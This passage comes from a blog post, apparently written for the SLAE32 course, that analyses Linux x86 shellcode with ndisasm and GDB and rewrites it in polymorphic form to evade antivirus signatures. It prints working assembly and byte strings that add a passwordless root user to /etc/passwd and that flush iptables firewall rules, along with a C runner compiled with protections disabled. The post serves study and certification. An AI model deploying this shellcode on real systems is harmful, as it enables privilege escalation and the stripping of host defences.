class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509103604.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The function header for the 
<strong>open<\/strong> syscall is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint open(const char *pathname, int flags);\n<\/pre><\/div>\n\n\n<p>Next, the arguments for the syscall to <strong>open<\/strong> are arranged in the registers prior to the call below:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509103952.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following the syscall, the file descriptor for the <strong>\/etc\/passwd<\/strong> file is moved from <strong>EAX<\/strong> into <strong>EBX<\/strong>, and a new value <strong>0x4<\/strong> is moved into <strong>EAX<\/strong>. This value <strong>0x4<\/strong> corresponds to the <strong>write<\/strong> syscall.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509104403.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>write<\/strong> function header is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nssize_t write(int fd, const void *buf, size_t count);\n<\/pre><\/div>\n\n\n<p>Following this, the string to write into <strong>\/etc\/passwd<\/strong> is pushed to the stack. 
As per the function header for the <strong>write<\/strong> syscall, the value to write into the file is pointed to by the <strong>ECX<\/strong> register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509104706.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Prior to the call to <strong>write<\/strong>, the syscall arguments are arranged as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509105559.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To close the file, the <strong>close<\/strong> syscall is used, and takes the file descriptor of the file it will close.<\/p>\n\n\n\n<p>The <strong>close<\/strong> function header is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint close(int fd);\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509111026.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the modified file is closed, the <strong>exit<\/strong> syscall is called, by moving <strong>0x1<\/strong> into <strong>EAX<\/strong> and calling <strong>int 0x80<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509111215.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following our analysis of the shellcode, we check our local <strong>\/etc\/passwd<\/strong> file and confirm that the new user r00t has been appended.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509111247.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Shellcode 2: Polymorphic version<\/h3>\n\n\n\n<p>Before we make any changes to the assembly instructions, we create a copy of the original in a separate file as below. The original shellcode size is <strong>69 bytes<\/strong>.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n\/* By Kris Katterjohn 11\/14\/2006\n *\n * 69 byte shellcode to add root user 'r00t' with no password to \/etc\/passwd\n *\n * for Linux\/x86\n *\n *\n *\n * section .text\n *\n *      global _start\n *\n * _start:\n *\n * ; open(&quot;\/etc\/\/passwd&quot;, O_WRONLY | O_APPEND)\n *\n *      push byte 5\n *      pop eax\n *      xor ecx, ecx\n *      push ecx\n *      push 0x64777373\n *      push 0x61702f2f\n *      push 0x6374652f\n *      mov ebx, esp\n *      mov cx, 02001Q\n *      int 0x80\n *\n *      mov ebx, eax\n *\n * ; write(ebx, &quot;r00t::0:0:::&quot;, 12)\n *\n *      push byte 4\n *      pop eax\n *      xor edx, edx\n *      push edx\n *      push 0x3a3a3a30\n *      push 0x3a303a3a\n *      push 0x74303072\n *      mov ecx, esp\n *      push byte 12\n *      pop edx\n *      int 0x80\n *\n * ; close(ebx)\n *\n *      push byte 6\n *      pop eax\n *      int 0x80\n *\n * ; exit()\n *\n *      push byte 1\n *      pop eax\n *      int 0x80\n *\/\n<\/pre><\/div>\n\n\n<p>Our updated version is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; adduser_polymorphic.nasm - 45 bytes\n; Author: Jack McBride (PA-6483)\n; Website:  https:\/\/jacklgmcbride.co.uk\n;\n; Purpose: SLAE32 exam assignment\n;\n;\n; Assignment 6: Polymorphism\n\nglobal _start\n\nsection .text\n\n_start:\n       
 jmp _cmd\n\n_main:\n        pop edx;        store string to be added to \/etc\/passwd\n        push byte 0x46\n        pop eax\n        int 0x80;       call setreuid\n        mov al, 0x5\n        push ecx\n        push 0x64777373\n        push 0x61702f2f\n        push 0x6374652f\n        mov ebx, esp\n        inc ecx\n        mov ch, 0x4\n        int 0x80;       call open on \/etc\/passwd with 401 flags\n        xor ecx, ecx\n        push ecx\n        xchg ecx, edx\n        xchg ebx, eax\n        xor eax, eax\n        mov al, 0x4\n        mov edx, 0x1A\n        int 0x80;       call write to append new user to \/etc\/passwd\n        xchg eax, esi\n        int 0x80\n\n_cmd:\n        call _main\n        db &quot;r00t::0:0::\/root:\/bin\/bash&quot;, 0xA\n<\/pre><\/div>\n\n\n<p>Our <strong>polymorphic<\/strong> version is <strong>45 bytes<\/strong> (24 bytes less than the original) = <strong>42% size decrease<\/strong>.<\/p>\n\n\n\n<p>To improve efficiency over the original shellcode, we opted to use the <strong>jmp-call-pop<\/strong> technique instead of pushing the hex encoded values for the new user account to the stack.<\/p>\n\n\n\n<p>In addition, we remove any unnecessary changes to registers, namely <strong>XOR<\/strong> instructions designed to clear registers that are already cleared. 
Additionally, we have removed the syscall to <strong>close<\/strong> the file descriptor for <strong>\/etc\/passwd<\/strong> once we have finished writing to it, as the operating system will do this automatically for us following the call to <strong>exit<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 3: Linux\/x86 - iptables -F - 70 bytes<\/h2>\n\n\n\n<p>The final shellcode that we will analyse is designed to flush all host-based firewall rules by issuing the <strong>iptables -F<\/strong> command.<\/p>\n\n\n\n<p>This can be used on a host which is blocking network communications to management ports such as SSH and might be later used by an attacker during the post-exploitation phase to perform further actions which require having a shell on the machine.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Ndisasm Analysis<\/h3>\n\n\n\n<p>The shellcode obtained from shell-storm is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\nAuthor: zillion\nEmail: zillion@safemode.org\nHome: http:\/\/www.safemode.org\n\nLinux x86 shellcode that does an execve() of \/sbin\/iptables -F in order to\nflush activated firewall rules.\n\nFile: flush-iptables-shell.c\n\n\/*\n * This shellcode will do \/sbin\/iptables -F\n * Written by zillion@safemode.org\n *\n *\/\n\nchar shellcode&#x5B;]=\n        &quot;\\xeb\\x21\\x5e\\x31\\xc0\\x88\\x46\\x0e\\x88\\x46\\x11\\x89\\x76\\x12\\x8d&quot;\n        &quot;\\x5e\\x0f\\x89\\x5e\\x16\\x89\\x46\\x1a\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x12&quot;\n        &quot;\\x8d\\x56\\x1a\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e&quot;\n        &quot;\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73\\x38\\x2d\\x46\\x32\\x33\\x34&quot;\n        &quot;\\x35\\x36\\x37\\x38\\x39\\x61\\x62\\x63\\x64\\x65&quot;;\n\nint main()\n{\n\n  int *ret;\n  ret = (int *)&amp;ret + 2;\n  (*ret) = 
(int)shellcode;\n}\n<\/pre><\/div>\n\n\n<p>To begin, we disassemble the shellcode into its assembly instructions using ndisasm:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\necho -ne &quot;\\xeb\\x21\\x5e\\x31\\xc0\\x88\\x46\\x0e\\x88\\x46\\x11\\x89\\x76\\x12\\x8d\\x5e\\x0f\\x89\\x5e\\x16\\x89\\x46\\x1a\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x12\\x8d\\x56\\x1a\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73\\x38\\x2d\\x46\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x61\\x62\\x63\\x64\\x65&quot; | ndisasm -u -\n00000000  EB21              jmp short 0x23\n00000002  5E                pop esi\n00000003  31C0              xor eax,eax\n00000005  88460E            mov &#x5B;esi+0xe],al\n00000008  884611            mov &#x5B;esi+0x11],al\n0000000B  897612            mov &#x5B;esi+0x12],esi\n0000000E  8D5E0F            lea ebx,&#x5B;esi+0xf]\n00000011  895E16            mov &#x5B;esi+0x16],ebx\n00000014  89461A            mov &#x5B;esi+0x1a],eax\n00000017  B00B              mov al,0xb\n00000019  89F3              mov ebx,esi\n0000001B  8D4E12            lea ecx,&#x5B;esi+0x12]\n0000001E  8D561A            lea edx,&#x5B;esi+0x1a]\n00000021  CD80              int 0x80\n00000023  E8DAFFFFFF        call 0x2\n00000028  2F                das\n00000029  7362              jnc 0x8d\n0000002B  696E2F69707461    imul ebp,&#x5B;esi+0x2f],dword 0x61747069\n00000032  626C6573          bound ebp,&#x5B;ebp+0x73]\n00000036  382D46323334      cmp &#x5B;dword 0x34333246],ch\n0000003C  3536373839        xor eax,0x39383736\n00000041  61                popa\n00000042  626364            bound esp,&#x5B;ebx+0x64]\n00000045  65                gs\n<\/pre><\/div>\n\n\n<p>As this shellcode is using the <strong>jmp-call-pop<\/strong> technique, we notice that the assembly instructions that we get from ndisasm don't exactly match the commented assembly provided by the 
shellcode author.<\/p>\n\n\n\n<p>We can investigate further using GDB.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">GDB Analysis<\/h3>\n\n\n\n<p>To begin, we take the shellcode buffer and insert it into the C program:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \\\n&quot;\\xeb\\x21\\x5e\\x31\\xc0\\x88\\x46\\x0e\\x88\\x46\\x11\\x89\\x76\\x12\\x8d\\x5e\\x0f\\x89\\x5e\\x16\\x89\\x46\\x1a\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x12\\x8d\\x56\\x1a\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73\\x38\\x2d\\x46\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x61\\x62\\x63\\x64\\x65&quot;;\n\nint main()\n{\n\n        printf(&quot;Shellcode Length:  %d\\n&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n\n<\/pre><\/div>\n\n\n<p>We compile it with GCC:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<p>We then start GDB and set two breakpoints: one on the <strong>main<\/strong> function, and the next at the first assembly instruction in the <strong>code<\/strong> variable as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510215248.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the initial instructions, we note that the code is performing the <strong>jmp-call-pop<\/strong> technique to push the command to the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img 
decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510215914.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, the command string is broken down into segments by inserting null bytes into the <strong>ESI<\/strong> register at specific offsets:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510221052.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Based on the argument structure of <strong>execve<\/strong>, the first argument is the <strong>pathname<\/strong> of the program that is being executed. As the shellcode is executing the <strong>iptables -F<\/strong> command, the <strong>pathname<\/strong> argument will be set to <strong>\/sbin\/iptables<\/strong> and <strong>argv<\/strong> will be set to <strong>-F<\/strong>.<\/p>\n\n\n\n<p>The function header for <strong>execve<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint execve(const char *pathname, char *const argv&#x5B;], char *const envp&#x5B;]);\n<\/pre><\/div>\n\n\n<p>In order to supply the arguments to <strong>execve<\/strong>, they are pushed as strings to the stack and appended with a null terminator to indicate the end of each string. 
Once this is done, a pointer to the pathname and a pointer to the arguments are moved into the <strong>EBX<\/strong> and <strong>ECX<\/strong> registers respectively.<\/p>\n\n\n\n<p>Next, for the call to <strong>execve<\/strong>, the value <strong>0x11<\/strong> is moved into <strong>EAX<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510222420.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Finally, the syscall to <strong>execve<\/strong> is called.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510222731.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Checking the output of the <strong>iptables -L<\/strong> command, we confirm that the iptables entry on our machine is empty, indicating that the shellcode worked as intended.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510223708.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Shellcode 3: Polymorphic version<\/h3>\n\n\n\n<p>Before we make any changes to the assembly instructions, we create a copy of the original in a separate file as below. 
The original shellcode is <strong>70 bytes<\/strong> in size.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\nAuthor: zillion\nEmail: zillion@safemode.org\nHome: http:\/\/www.safemode.org\n\nLinux x86 shellcode that does an execve() of \/sbin\/iptables -F in order to\nflush activated firewall rules.\n\nFile: flush-iptables-shell.c\n\n\/*\n * This shellcode will do \/sbin\/iptables -F\n * Written by zillion@safemode.org\n *\n *\/\n\nchar shellcode&#x5B;]=\n        &quot;\\xeb\\x21\\x5e\\x31\\xc0\\x88\\x46\\x0e\\x88\\x46\\x11\\x89\\x76\\x12\\x8d&quot;\n        &quot;\\x5e\\x0f\\x89\\x5e\\x16\\x89\\x46\\x1a\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x12&quot;\n        &quot;\\x8d\\x56\\x1a\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e&quot;\n        &quot;\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73\\x38\\x2d\\x46\\x32\\x33\\x34&quot;\n        &quot;\\x35\\x36\\x37\\x38\\x39\\x61\\x62\\x63\\x64\\x65&quot;;\n\nint main()\n{\n\n  int *ret;\n  ret = (int *)&amp;ret + 2;\n  (*ret) = (int)shellcode;\n}\n<\/pre><\/div>\n\n\n<p>Our updated version is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; flush_iptables_polymorphic - 49 bytes\n; Author: Jack McBride (PA-6483)\n; Website: https:\/\/jacklgmcbride.co.uk\n;\n; Purpose: SLAE32 exam assignment\n;\n;\n; Assignment 6: Polymorphism\n\nglobal _start\n\nsection .text\n\n_start:\n        xor edx,edx\n        ; push -F\n        push edx\n        push word 0x462d\n        mov eax, esp; save pointer to second argument in EAX\n        ; push \/sbin\/iptables\n        push edx\n        push 0x73656c62\n        push 0x61747069\n        push 0x2f2f6e69\n        push 0x62732f2f\n        ; move pointer to file name into ebx\n        mov ebx, esp\n        push edx\n        push eax; push second argument\n        push ebx; push first argument\n        mov ecx, esp\n        xor eax, 
eax\n        mov     al,0xb\n        int     0x80\n        xor eax, eax\n        mov al, 0x1\n        int 0x80\n<\/pre><\/div>\n\n\n<p>Our polymorphic version is <strong>49 bytes<\/strong> (21 bytes less than the original) = <strong>35% size decrease<\/strong>.<\/p>\n\n\n\n<p>In the original, the shellcode leveraged the <strong>jmp-call-pop<\/strong> technique to initially push the command to execute to the stack. In our version, the shellcode instead pushes the pathname of the <strong>\/sbin\/iptables<\/strong> command to the stack, and then pushes its <strong>-F<\/strong> argument to the stack as well. This saves us some instructions, as we do not have to make as many modifications to the <strong>ESI<\/strong> register as was the case in the original.<\/p>\n\n\n\n<p>We then null-terminate the pushed arguments where needed and make the call to the <strong>execve<\/strong> syscall. In addition to this, we save space by removing any unnecessary instructions that clear or modify registers.<\/p>\n\n\n\n<p>We run the new polymorphic shellcode and confirm that it works as expected:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510231852.png\" alt=\"\"\/><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<p>This concludes our analysis of polymorphism, and our process of applying it to the refactoring of our three example shellcodes from ShellStorm.<\/p>\n\n\n\n<p>The Assembly and C source code for my polymorphic shellcode implementations can be found on my <a href=\"https:\/\/github.com\/war4uthor\/SLAE32\">GitHub repository<\/a>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the <a 
href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SecurityTube Linux Assembly Expert<\/a> certification.<\/p>\n\n\n\n<p><strong>Student ID:<\/strong> PA-6483<\/p>\n\n\n\n<p>All code was tested on 32-bit Kali Linux:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(jack\u327fkali)-&#x5B;~\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500$ uname -a\nLinux kali 5.5.0-kali2-686-pae #1 SMP Debian 5.5.17-1kali1 (2020-04-21) i686 GNU\/Linux\n<\/pre><\/div>\n\n\n<p>In the next blog post, we will be covering our implementation of a custom crypter using the AES encryption cipher.<\/p>\n\n\n\n<p>Thanks for reading!<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n","protected":false},"excerpt":{"rendered":"<p>In this blog post, we will be covering the concept of polymorphism, and how it can be used to modify shellcode to bypass antivirus signature detection. This post follows on in our blog series created for the SLAE32 certification course provided by Pentester Academy. 
Overview Antivirus solutions tend to rely on two main detection mechanisms&hellip;<\/p>\n","protected":false},"author":1,"featured_media":305,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29,6,30,26,28],"tags":[27],"class_list":["post-286","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-assembly","category-certifications","category-linux","category-reverse-engineering","category-shellcoding","tag-slae32"],"_links":{"self":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/286","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=286"}],"version-history":[{"count":18,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/286\/revisions"}],"predecessor-version":[{"id":735,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/286\/revisions\/735"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media\/305"}],"wp:attachment":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=286"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=286"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/bl
og\/index.php\/wp-json\/wp\/v2\/tags?post=286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}